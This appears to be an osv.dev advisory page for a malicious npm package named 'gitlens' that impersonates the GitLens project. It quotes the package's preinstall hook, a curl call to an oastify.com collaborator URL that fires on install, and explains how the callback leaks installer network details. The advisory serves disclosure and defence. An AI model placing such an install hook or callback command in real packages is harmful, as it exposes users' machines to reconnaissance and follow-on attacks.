npm

gitlens @9.4.1

Vulnerability report · Last retrieved from osv.dev July 9, 2026 at 6:28 PM UTC

Malicious

OSV ID

MAL-2026-6973

Ecosystem

npm

Summary

package.json declares a preinstall lifecycle hook that runs curl https://bt8hbz0owdan31qvdap2u5b8izoqcg05.oastify.com on npm install . oastify.com is Burp Collaborator OAST infrastructure used to confirm code execution and capture the installer's public IP and DNS resolver metadata at an attacker-controlled listener. The package is otherwise a hollow stub (empty description, empty author, main is a one-line no-op printing 'Hello from test package'), and the package name impersonates the well-known GitLens project — matching the typosquat-with-reconnaissance-payload shape. Installing this package causes an unsolicited outbound HTTP/DNS callback that discloses installer network identifiers to a third party and confirms that arbitrary command execution succeeded on the installer's machine, enabling follow-on targeting.

Source: amazon-inspector (c60743ac7b975c729e8ff8bd5310f71fce030efc3979f419f60e129921364ae7)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.